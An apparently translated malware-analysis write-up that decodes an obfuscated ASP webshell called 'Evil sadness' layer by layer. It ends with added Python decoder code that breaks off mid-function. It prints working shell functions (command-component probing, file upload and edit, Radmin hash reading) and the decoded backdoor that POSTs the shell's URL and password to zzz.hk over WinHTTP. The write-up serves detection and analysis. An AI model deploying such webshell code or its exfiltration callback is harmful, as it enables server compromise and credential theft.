Evil sadness webshell: full decoding and backdoor analysis

  
I call this a "full decoding" because the shell stacks an unusually rich set of encoding layers, packs a lot of functionality, and hides its backdoor very well: a packet capture on your own test box will not show it.

A friend sent me this shell and asked me to check it for a backdoor. On a first pass I really did not see one. A few places looked suspicious, but on closer inspection they were dead code and did nothing. Only much later did it turn out that there was a lot more going on under the plain exterior.

Screenshots first.

[Screenshot: login page]

The demure "Mona Lisa" glyph almost makes you feel sorry for it.

[Screenshot: main interface]
The feature set is fairly extensive.


Now the decoding. Like the others of its kind, the outermost layer of this shell is the Microsoft Script Encoder (the VBScript.Encode language tag); strip it with any of the usual decoders for that. The result begins like this:

Code:

<%@ LANGUAGE = VBScript %><%
Server.ScriptTimeout=999999999
UserPass="111"        'password
mNametitle="Evil sadness"    'name
Copyright="Evil sadness"    'copyright
SItEuRl="HTTP://ZZZ.Hk"    'site URL
Font="300pt"        'size of the login glyph
pic="Ÿ"        'Webdings code of the login glyph; see http://zzz.hk/webdings.htm
BodyColor="pink"        'page background colour; see http://zzz.hk/color.htm
FontColor="#000"        'normal text colour
LinkColor="#50616d"    'link colour
BorderColor="#d8d8d8"    'file list border colour
LinkOverBJ="#000000"    'link hover background colour
LinkOverFont="red"        'link hover text colour
FormColorBj="#dddddd"    'input box background colour
FormColorBorder="#222000"    'input box border colour
'**********************************************
'This program is for security testing of server vulnerabilities only.
'It must not be used for illegal purposes; you bear the consequences yourself!
'By 丫丫
'2009.09.07
'**********************************************
Response.Buffer =true
On Error Resume Next
sub ShowErr()
  If Err Then
RRS"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
Err.Clear:Response.Flush
  End If
end sub
Sub RRS(str)
response.write(str)
End Sub
Function RePath(S)
  RePath=Replace(S,"\","\\")
End Function
Function RRePath(S)
  RRePath=Replace(S,"\\","\")
End Function
URL=Request.ServerVariables("URL")
ServerIP=Request.ServerVariables("LOCAL_ADDR")
Action=Request("Action")
RootPath=Server.MapPath(".")
WWWRoot=Server.MapPath("/")
FolderPath=Request("FolderPath")
FName=Request("FName")

BackUrl="<br><br><center><a href='javascript:history.back()'>Back</a></center>"
Function AAAA(objstr):objstr=Replace(objstr,"Θ",""""):For i=1 To Len(objstr):If Mid(objstr, i, 1)<>"Ω" Then:NewStr=Mid(objstr,i,1)&NewStr:Else:NewStr=vbCrlf&NewStr:End If:Next:AAAA=NewStr:End Function
RRS"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
RRS"<title>"&mNametitle&" - "&ServerIP&" </title>"
RRS"<style type=""text/css"">"
RRS"body,td{font-size: 12px;SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #383839;}"
RRS"body,tr,td{margin:0px;font-size:12px;background-color:"&BodyColor&";color:"&FontColor&";}"
RRS"input,select,textarea{font-size:12px;background-color:"&FormColorBj&";border:1px solid "&FormColorBorder&"}"
RRS"a{color:"&LinkColor&";text-decoration:none;}a:hover{color:"&LinkOverFont&";background:"&LinkOverBJ&"}"
RRS".am{color:"&LinkColor&";font-size:11px;}"
RRS"</style>"
dim a,b
a=" RRS%22%3Cscript%20language%3Djavascript%3Efunction%20killErrors%28%29%7Breturn%20true%3B%7Dwindow.onerror%3DkillErrors%3B%22%0D%0ARRS%22function%20yesok%28%29%7Bif%20%28confirm%28%22%22%u4F60%u786E%u8BA4%u8981%u6267%u884C%u6B64%u64CD%u4F5C%u5417%uFF1F%22%22%29%29return%20true%3Belse%20return%20false%3B%7D%22%0D%0ARRS%22function%20ShowFolder%28Folder%29%7Btop.addrform.FolderPath.value%20%3D%20Folder%3Btop.addrform.submit%28%29%3B%7D%22%0D%0ARRS%22function%20FullForm%28FName%2CFAction%29%7Btop.hideform.FName.value%20%3D%20FName%3Bif%28FAction%3D%3D%22%22CopyFile%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u590D_%u5236%u5230%u76EE%u6807%u6587_%u4EF6%u7684_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22MoveFile%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165_%u79FB_%u52A8%u5230%u76EE%u6807%u6587%u4EF6_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22CopyFolder%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u79FB%u52A8%u5230%u76EE%u6807%u6587%u4EF6%u5939_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22MoveFolder%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u79FB%u52A8%u5230%u76EE%u6807%u6587%u4EF6%u5939_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22NewFolder%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u8981%u65B0%u5EFA%u7684%u6587%u4EF6%u5939_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20%3D%20DName%3B%7Delse%20if%28FAction%3D%3D%22%22CreateMdb%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u8981%u65B0%u5EFA%u7684Mdb%u6587%u4EF6_%u5168_%u540D_%u79F0%2C%u6CE8%u610F%u4E0D%u80FD%u540C%u540D%uFF01%22%22%2CFName%29%3Btop.hideform.FName.value%20%3D%20DName%3B%7Delse%20if%28FAction%3D%3D%22%22CompactMdb%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u8981%u538B%u7F29%u7684Mdb%u6587%u4EF6_%u5168_%u540D_%u79F0%2C%u6CE8%u610F%u6587%u4EF6%u662F%u5426%u5B58%u5728%uFF01%22%22%2CFName%29%3Btop.hideform.FName.value%20%3D%20DName%3B%7Delse%7BDName%20%3D%20%22%22Other%22%22%3B%7Dif%28DName%21%3Dnull%29%7Btop.hideform.Action.value%20%3D%20FAction%3Btop.hideform.submit%28%29%3B%7Delse%7Btop.hideform.FName.value%20%3D%20%22%22%22%22%3B%7D%7D%22":b=replace(a,"@@@","Rinimama"):c=split(b,"Rinimama"):for i=0 to ubound(c):temp=temp+c(i):next:execute(unescape(temp)):RRS"function DbCheck(){if(DbForm.DbStr.value == """"){alert(""Connect to the database first"");FullDbStr(0);return false;}return true;}":RRS"function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = ""Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&RePath(Session("FolderPath"))&"\\db.mdb;Jet OLEDB:Database Password=***"";Str[1] = ""Driver={Sql Server};Server="&ServerIP&",1433;Database=DbName;Uid=sa;Pwd=****"";Str[2] = ""Driver={MySql};Server="&ServerIP&";Port=3306;Database=DbName;Uid=root;Pwd=****"";Str[3] = ""Dsn=DsnName"";Str[4] = ""Select * FROM [TableName] Where ID<100"";Str[5] = ""Insert INTO [TableName](USER,PASS) VALUES(\'username\',\'password\')"";Str[6] = ""Delete FROM [TableName] Where ID=100"";Str[7] = ""Update [TableName] SET USER=\'username\' Where ID=100"";Str[8] = ""Create TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"";Str[9] = ""Drop TABLE [TableName]"";Str[10]= ""Alter TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"";Str[11]= ""Alter TABLE [TableName] Drop COLUMN PASS"";Str[12]= ""When only one row is returned the full contents of each field are shown; use a WHERE condition to achieve this.\nWith more than one row only the first fifty bytes of each field are shown."";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = """";abc.innerHTML=""<center>Make sure the database is connected before entering SQL statements.</center>"";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}"
RRS"function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert(""Check the database connection string!"");return false;}if(str.length<10){alert(""Check the SQL statement!"");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="""";DbForm.submit();return true;}":RRS"</script>":rrs "<body" :If Action="" then RRS " scroll=no":rrs ">"
' component probe table, session folder bookkeeping, then the first AAAA-encoded block (the radmin() function, which contains an XmlSend call)
Dim ObT(13,2):ObT(0,0) = "Scripting.FileSystemObject":ObT(0,2) = "File operations component":ObT(1,0) = "wscript.shell":ObT(1,2) = "Command execution component":ObT(2,0) = "ADOX.Catalog":ObT(2,2) = "Access database creation component":ObT(3,0) = "JRO.JetEngine":ObT(3,2) = "Access compaction component":ObT(4,0) = "Scripting.Dictionary":ObT(4,2) = "Stream upload helper component":ObT(5,0) = "Adodb.connection":ObT(5,2) = "Database connection component":ObT(6,0) = "Adodb.Stream":ObT(6,2) = "Stream upload component":ObT(7,0) = "SoftArtisans.FileUp":ObT(7,2) = "SA-FileUp file upload component":ObT(8,0) = "LyfUpload.UploadFile":ObT(8,2) = "刘云峰 (Lyf) file upload component":ObT(9,0) = "Persits.Upload.1":ObT(9,2) = "ASPUpload file upload component":ObT(10,0) = "JMail.SmtpMail":ObT(10,2) = "JMail mail component":ObT(11,0) = "CDONTS.NewMail":ObT(11,2) = "Virtual SMTP mail-sending component":ObT(12,0) = "SmtpMail.SmtpMail.1":ObT(12,2) = "SmtpMail mail-sending component":ObT(13,0) = "Microsoft.XMLHTTP":ObT(13,2) = "Data transfer component":For i=0 To 13:Set T=Server.CreateObject(ObT(i,0)):If -2147221005 <> Err Then:IsObj=" √":Else:IsObj=" ●":Err.Clear:End If:Set T=Nothing:ObT(i,1)=IsObj:Next:If FolderPath<>"" then:Session("FolderPath")=RRePath(FolderPath):End If:If Session("FolderPath")="" Then:FolderPath=RootPath:Session("FolderPath")=FolderPath:End if:execute AAAA("noitcnuF dnEΩ tluser = retniotxehΩ txeNΩ j + tluser = tluserΩ txeNΩ 61 * j = jΩ i - )nirts(neL oT 1 = k roFΩ fI dnEΩ ))1 ,i ,nirts(diM(tnIC = jΩ nehT Θ0Θ => )1 ,i ,nirts(diM dnA Θ9Θ =< )1 ,i ,nirts(diM fIΩ fI dnEΩ 01 = jΩ nehT ΘAΘ = )1 ,i ,nirts(diM rO ΘaΘ = )1 ,i ,nirts(diM fIΩ fI dnEΩ 11 = jΩ nehT ΘBΘ = )1 ,i ,nirts(diM rO ΘbΘ = )1 ,i ,nirts(diM fIΩ fI dnEΩ 21 = jΩ nehT ΘCΘ = )1 ,i ,nirts(diM rO ΘcΘ = )1 ,i ,nirts(diM fIΩ fI dnEΩ 31 = jΩ nehT ΘDΘ = )1 ,i ,nirts(diM rO ΘdΘ = )1 ,i ,nirts(diM fIΩ fI dnEΩ 41 = jΩ nehT ΘEΘ = )1 ,i ,nirts(diM rO ΘeΘ = )1 ,i ,nirts(diM fIΩ fI dnEΩ 51 = jΩ nehT ΘFΘ= )1 ,i ,nirts(diM rO ΘfΘ = )1 ,i ,nirts(diM fIΩ )nirts(neL oT 1 = i roFΩ 0 = tluserΩ tluser ,k ,j ,i miDΩ )nirts(retniotxeh noitcnuFΩnoitcnuF dnEΩfI dnEΩΘ!daeR t'naC !rorrEΘ etirw.esnopseRΩ eslEΩ))))0(yarrAtroP(xeH(rtSC&)))1(yarrAtroP(xeH(rtSC(retniotxeh etirw.esnopseRΩ Θ:Θ& troP etirw.esnopseRΩ nehT )yarrAtroP(yarrAsI fIΩ) troP & htaPnimdaR(DAERGER.HSW=yarrAtroPΩΘ>rb<>rb<Θ etirw.esnopseRΩfI dnEΩΘ!daeR t'naC !rorrEΘ etirw.esnopserΩeslEΩjborts etirw.esnopserΩtxeNΩ fI dnEΩ))i(yarrAretemaraP(xeH & jbOrts = jbOrtsΩeslEΩ)))i(yarrAretemaraP(xeH(rtSC&Θ0Θ & jbOrts = jbOrtsΩ nehT 1=)))i(yarrAretemaraP(xeh( neL  fIΩ)yarrAretemaraP(dnuoBU oT 0 = i roFΩnehT )yarrAretemaraP(yarrAsI fIΩΘ:Θ&retemaraP etirw.esnopseRΩ)htaPt00R( dneSlmXΩ) retemaraP & htaPnimdaR(DAERGER.HSW=yarrAretemaraPΩΘ>rb<>rb<rar.hsah_nimdaR/tfos/kh.zzz//:ptth:址地载下具工,接连试调do或具工hsaHnimdaR用后值HSAH出读:意注>rb<Θetirw.esnopseRΩΘtroPΘ
...................................................................



Following my usual habit, I started with the most heavily used encoding.

Throughout the file it follows this pattern:
Code:
execute AAAA("noitcnuF dnEΩ tluser = retniotxehΩ txeNΩ j + tluser = tluserΩ txeNΩ 61 * j = jΩ i - )nirts(neL oT 1 = k roFΩ fI dnEΩ ))1 ,i ,nirts(diM(tnIC = jΩ nehT Θ0Θ => )1 ,i ,nirts(diM dnA Θ9Θ =< )1 ,i ,nirts(diM fIΩ fI dnEΩ 01 = jΩ nehT ΘAΘ = )1 ,i ,nirts(diM rO ΘaΘ")

The decoder function is:
Function AAAA(objstr):objstr=Replace(objstr,"Θ",""""):For i=1 To Len(objstr):If Mid(objstr, i, 1)<>"Ω" Then:NewStr=Mid(objstr,i,1)&NewStr:Else:NewStr=vbCrlf&NewStr:End If:Next:AAAA=NewStr:End Function

A typical Thirteen (十三)-style decoder, which is easy to handle. The one difference is that it does not use Thirteen's way of running the result: the decoded string is never assigned to a variable, it is handed straight to execute.

I dealt with this quickly using my own WEBSHELL Decoder & Encoder.
[Screenshot: the decoded result in WEBSHELL Decoder & Encoder]

Now the second most common encoding becomes visible.
The decoder:
Code:
Function MorfiCoder(Code):MorfiCoder=Replace(Replace(StrReverse(Code),"\*\",""""),"/*/",vbCrlf):End Function

How it is invoked:
execute MorfiCoder("/*/noitcnuF dnE/*/fi dne/*/\*")

Decoded the same way as above.


Only at this point did I go through the file carefully, and there are three more encoded spots. The first is right at the top of the file.
The code is:
Code:
a=" RRS%22%3Cscript%20language%3Djavascript%3Efunction%20killErrors%28%29%7Breturn%20true%3B%7Dwindow.onerror%3DkillErrors%3B%22%0D%0ARRS%22function%20yesok%28%29%7Bif%20%28confirm%28%22%22%u4F60%u786E%u8BA4%u8981%u6267%u884C%u6B64%u64CD%u4F5C%u5417%uFF1F%22%22%29%29return%20true%3Belse%20return%20false%3B%7D%22%0D%0ARRS%22function%20ShowFolder%28Folder%29%7Btop.addrform.FolderPath.value%20%3D%20Folder%3Btop.addrform.submit%28%29%3B%7D%22%0D%0ARRS%22function%20FullForm%28FName%2CFAction%29%7Btop.hideform.FName.value%20%3D%20FName%3Bif%28FAction%3D%3D%22%22CopyFile%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u590D_%u5236%u5230%u76EE%u6807%u6587_%u4EF6%u7684_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22MoveFile%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165_%u79FB_%u52A8%u5230%u76EE%u6807%u6587%u4EF6_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22CopyFolder%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u79FB%u52A8%u5230%u76EE%u6807%u6587%u4EF6%u5939_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22MoveFolder%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u79FB%u52A8%u5230%u76EE%u6807%u6587%u4EF6%u5939_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22NewFolder%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u8981%u65B0%u5EFA%u7684%u6587%u4EF6%u5939_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20%3D%20DName%3B%7Delse%20if%28FAction%3D%3D%22%22CreateMdb%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u8981%u65B0%u5EFA%u7684Mdb%u6587%u4EF6_%u5168_%u540D_%u79F0%2C%u6CE8%u610F%u4E0D%u80FD%u540C%u540D%uFF01%22%22%2CFName%29%3Btop.hideform.FName.value%20%3D%20DName%3B%7Delse%20if%28FAction%3D%3D%22%22CompactMdb%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u8981%u538B%u7F29%u7684Mdb%u6587%u4EF6_%u5168_%u540D_%u79F0%2C%u6CE8%u610F%u6587%u4EF6%u662F%u5426%u5B58%u5728%uFF01%22%22%2CFName%29%3Btop.hideform.FName.value%20%3D%20DName%3B%7Delse%7BDName%20%3D%20%22%22Other%22%22%3B%7Dif%28DName%21%3Dnull%29%7Btop.hideform.Action.value%20%3D%20FAction%3Btop.hideform.submit%28%29%3B%7Delse%7Btop.hideform.FName.value%20%3D%20%22%22%22%22%3B%7D%7D%22"
b=replace(a,"@@@","Rinimama")
c=split(b,"Rinimama")
for i=0 to ubound(c)
temp=temp+c(i)
next
execute(unescape(temp))


The escape()-encoded string is chopped into pieces and reassembled at run time before it reaches execute. To decode it, swap execute for Response.Write Server.HTMLEncode (or anything else that writes the string out or saves it instead of running it).
This gives the plaintext:
Code:
RRS"<script language=javascript>function killErrors(){return true;}window.onerror=killErrors;"
RRS"function yesok(){if (confirm(""Are you sure you want to perform this action?""))return true;else return false;}"
RRS"function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}"
' prompt texts translated from the Chinese; the originals carry stray underscores inside words, which do nothing at run time
RRS"function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction==""CopyFile""){DName = prompt(""Enter the full name of the copy destination file"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFile""){DName = prompt(""Enter the full name of the move destination file"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""CopyFolder""){DName = prompt(""Enter the full name of the destination folder"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFolder""){DName = prompt(""Enter the full name of the destination folder"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""NewFolder""){DName = prompt(""Enter the full name of the folder to create"",FName);top.hideform.FName.value = DName;}else if(FAction==""CreateMdb""){DName = prompt(""Enter the full name of the Mdb file to create (it must not already exist!)"",FName);top.hideform.FName.value = DName;}else if(FAction==""CompactMdb""){DName = prompt(""Enter the full name of the Mdb file to compact (check that it exists!)"",FName);top.hideform.FName.value = DName;}else{DName = ""Other"";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = """";}}"


Further down there is this encoded block:
Code:
Gang="汗汗汗汗汗noitcnuF dnE汗gnihtoN=ptth teS汗dnes.ptth汗eslaf,lrutsoP,""TSOP"" nepo.ptth汗))"""",""^"",w(ecalper(tcejbOetaerC =ptth tes汗txen emuser rorre no汗)"""",flrcbv,)lrutsoP(mirt(ecalper=lrutsoP汗""1.5.tseuqerptthn^iw^.ptthni^w^""=w汗w mid汗)lrutsoP(dneSlmX noitcnuF汗汗汗汗汗汗"
execute(Unlin(Gang))


The decoder is:
Code:
function Unlin(bb):for i = 1 to len(bb):if mid(bb,i,1)<>"汗" then
tmp = Mid(bb, i, 1) + tmp    ' prepend: the loop reverses the string
else:tmp=vbcrlf&tmp          ' 汗 marks a line break
end if
next:Unlin=tmp:end function


This is a variant of Hacker Wei's (黑客伟) reverse-order encoder, slightly different from the version that circulates online. Decoded:
Code:
Function XmlSend(Posturl)
dim w
w="^w^inhttp.^wi^nhttprequest.5.1"
Posturl=replace(trim(Posturl),vbcrlf,"")    ' a doubled quote inside the encoded literal is a single quote at run time, so this is "" not """"
on error resume next
set http= CreateObject(replace(w,"^",""))    ' the ^ characters are stripped here: winhttp.winhttprequest.5.1
http.open "POST",Posturl,false    ' synchronous POST made by the server, not by the browser
http.send
Set http=Nothing
End Function


Inside it, w is obfuscated once more with ^ characters that are removed just before CreateObject. The real code is:
Code:
Function XmlSend(Posturl)
Posturl=replace(trim(Posturl),vbcrlf,"")
on error resume next
set http= CreateObject("winhttp.winhttprequest.5.1")
http.open "POST",Posturl,false
http.send
Set http=Nothing
End Function


In my first pass I assumed nothing else was encoded. Calling an HTTP component from a webshell struck me as odd, but the only thing I found was a master-password backdoor:
Code:
if FName="URL" then    ' any request carrying FName=URL marks the session as logged in with the real password
  Session("web2a2dmin") = UserPass
   URL()
end if


I had seen this master-password trick in earlier shells, but when I tried it locally I could not get in. A closer look at the login code explains why:
Code:
IF SEssIoN("KKK")<>UsERpaSs thEn    ' the mixed case is the sample's own; VBScript is case-insensitive
IF requeSt.FoRM("Lpass")<>"" TheN
iF REquesT.foRM("Lpass")=uSERPASS then
SEsSIoN("KKK")=uSERPAss    ' login is gated on Session("KKK"), which the master-password path never sets
rESPOnsE.rEdirEct Url
end if


The login check reads Session("KKK"), while the backdoor sets Session("web2a2dmin"), so that backdoor is dead: leftover code that no longer does anything.

At this point I figured there were no more backdoors, but two things kept bothering me.
First, the WinHTTP call above: I know that component can open remote URLs, and it runs on the server, not on the client.
Second, right below that code there is this:
Code:
if instr(Request.ServerVariables("SERVER_NAME"),"localhost")<>0 then R00tPath=""
if instr(Request.ServerVariables("SERVER_NAME"),"192.168.")<>0 then R00tPath=""
if instr(Request.ServerVariables("SERVER_NAME"),"172.0.0.1")<>0 then R00tPath=""
if instr(Request.ServerVariables("SERVER_NAME"),"10.")<>0 then R00tPath=""
if instr(Request.ServerVariables("SERVER_NAME"),"local")<>0 then R00tPath="":


Anyone who has read my earlier articles will recognise this: it checks whether the shell is being run on a local or private-network host and, if so, sets R00tPath to an empty string. (Two details in the shell's own code are worth noting: the third line tests for 172.0.0.1 rather than 127.0.0.1, so a request to the loopback address is not treated as local at all, and the "local" test on the last line already matches "localhost".)

I went looking for where R00tPath is used and found these call sites:
1.
Code:
Function radmin()
Set WSH= Server.CreateObject("WSCRIPT.SHELL")
RadminPath="HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\"
Parameter="Parameter"
Port = "Port"
Response.write"<br>Note: after reading the hash, connect with the RadminHash tool or by patching in OllyDbg. Tool download: http://zzz.hk/soft/Radmin_hash.rar<br><br>"
ParameterArray=WSH.REGREAD(RadminPath & Parameter )
XmlSend (R00tPath)    ' callback on every Radmin hash read; no once-per-session guard here
Response.write Parameter&":"


2.
Code:
function upfile()
  if request("action2")="post" then
    set u=new upc : set f=u.ua("localfile")
uname=u.form("topath")
    if uname="" or f.filesize=0 then
      si="<br>Enter the full destination path, then choose a file to upload!"
    else
        f.saveas uname
        if err.number=0 then
          si="<center><br><br><br>File "&uname&" uploaded successfully!</center>"
if session("IDebugMode") <> "ok" then    ' callback once per session, only after a successful upload
XmlSend (R00tPath):session("IDebugMode")="ok"
end if
end if


3.
Code:
Function EditFile(Path)
  If Request("Action2")="Post" Then
  Set T=CF.CreateTextFile(Path)
T.WriteLine Request.form("content")
T.close
  Set T=nothing
if session("IDebugMode") <> "ok" then    ' same once-per-session guard after a file is written
XmlSend (R00tPath):session("IDebugMode")="ok"
end if
SI="<center><br><br><br>File saved successfully!</center>"
SI=SI&BackUrl


4.
Code:
case "Alexa"
dim AlexaUrl,Top
AlexaUrl=request("u")
Top=Alexa(AlexaUrl)
if AlexaUrl="" then AlexaUrl=""&request.servervariables("http_host")&""
SI="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'><tr><td height='20' colspan='3' align='center' bgcolor='menu'>Server component information</td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>Server name</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&request.serverVariables("SERVER_NAME")&"</td></tr><form method=post action='http://www.ip138.com/ips.asp' name='ipform' target='_blank'><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>Server IP</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'><input type='text' name='ip' size='15' value='"&Request.ServerVariables("LOCAL_ADDR")&"'style='border:0px'><input type='submit' value='Look up server location'style='border:0px'><input type='hidden' name='action' value='2'></td></tr></form><form method=post action='?Action=Alexa' name='form1'><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>Server Alexa rank</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'><input type='text' name='u' value='"&AlexaUrl&"' size=40 style='border:0px'>Rank:<input type='text' value='"&Top&"' size=10><input type='submit'  value='Query'></td></tr></form><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>Server time</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&now&" </td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>Server CPU count</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("NUMBER_OF_PROCESSORS")&"</td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>Server operating system</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("OS")&"</td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>Web server version</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("SERVER_SOFTWARE")&"</td></tr>":if session("IDebugMode") <> "ok" then
XmlSend (R00tPath):session("IDebugMode")="ok"    ' callback once per session when the server-info page is viewed
end if


These XmlSend(R00tPath) call sites have an obvious backdoor signature: each one is guarded so the callback is not submitted over and over.

Taken together with the points above, the odds of a backdoor looked high.

There was no way around it: I had not found where R00tPath is assigned, so I went back to the start of the code.

Just above the first XmlSend(R00tPath) call I found yet another encoded block. I had assumed everything was decoded by now, so this came as a surprise.

Code:
A=" 13. 10. 117. 61. 114. 101. 113. 117. 101. 115. 116. 46. 115. 101. 114. 118. 101. 114. 118. 97. 114. 105. 97. 98. 108. 101. 115. 40. 34. 104. 116. 116. 112. 95. 104. 111. 115. 116. 34. 41. 38. 117. 114. 108. 58. 82. 48. 48. 116. 80. 97. 116. 104. 61. 34. 104. 116. 116. 112. 58. 47. 47. 122. 122. 122. 46. 104. 107. 47. 108. 47. 63. 117. 61. 34. 38. 117. 38. 34. 38. 112. 61. 34. 38. 117. 115. 101. 114. 112. 97. 115. 115. 38. 34. 34. 13. 10."
execute(AA(A))


The decoder:
Code:
function AA(asp)
mianasp=split(asp,".")    ' dot-separated decimal character codes
for i=0 to UBound(mianasp)-1    ' UBound-1 skips the empty field after the final dot
hao=mianasp(i)
aspcode=aspcode+chr(hao)    ' chr() coerces " 13" and friends to a number
next:AA=aspcode
end function


Plain ASCII codes. Replace execute with response.write and out comes the plaintext:

Code:
u=request.servervariables("http_host")&url:R00tPath="http://zzz.hk/l/?u="&u&"&p="&userpass&""


And that is this shell's backdoor!!! It automatically sends the shell's URL and password to zzz.hk.
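To make the five custom layers reproducible without loading the shell into IIS, here is an added Python reimplementation of each decoder. This is my own code, not the shell's and not the author's WEBSHELL Decoder & Encoder; the sample strings are the encoded fragments quoted above, copied as they sit inside the VBScript literals, which is why a `""` inside them is unescaped to a single quote before decoding.

```python
"""Python reimplementation of the five custom decoders stacked in the Evil sadness shell.
Added example: my own code, not the shell's and not the author's WEBSHELL Decoder & Encoder.
The *_SAMPLE strings are the encoded fragments quoted in the write-up, copied as they
appear inside the VBScript string literals."""
import re

CRLF = "\r\n"


def vb_literal(s):
    """Runtime value of text copied from inside a VBScript "..." literal:
    a doubled quote stands for one quote character."""
    return s.replace('""', '"')


def decode_aaaa(objstr):
    """AAAA(): map Θ to a quote, then prepend each character to the output
    (which reverses the string), mapping Ω to a line break."""
    objstr = objstr.replace("Θ", '"')
    out = ""
    for ch in objstr:
        out = (CRLF if ch == "Ω" else ch) + out
    return out


def decode_unlin(bb):
    """Unlin(): the same prepend loop as AAAA, with 汗 as the only separator."""
    out = ""
    for ch in bb:
        out = (CRLF if ch == "汗" else ch) + out
    return out


def decode_morficoder(code):
    r"""MorfiCoder(): StrReverse, then \*\ -> quote and /*/ -> line break."""
    return code[::-1].replace("\\*\\", '"').replace("/*/", CRLF)


def js_unescape(s):
    """JScript unescape(): %uXXXX is a UTF-16 code unit, %XX a single byte."""
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def decode_split_unescape(a):
    """The split/join layer: @@@ -> marker, split on the marker, re-join, then
    unescape. Unless the marker occurs in the data this is plain unescape()."""
    return js_unescape("".join(a.replace("@@@", "Rinimama").split("Rinimama")))


def decode_ascii_dots(asp):
    """AA(): dot-separated decimal character codes. The VBScript loop runs to
    UBound-1, so the empty field after the final dot is skipped."""
    fields = asp.split(".")
    return "".join(chr(int(f)) for f in fields[:-1])


def recover_progid(decoded_xmlsend):
    """The decoded XmlSend still hides its ProgID behind ^ characters that are
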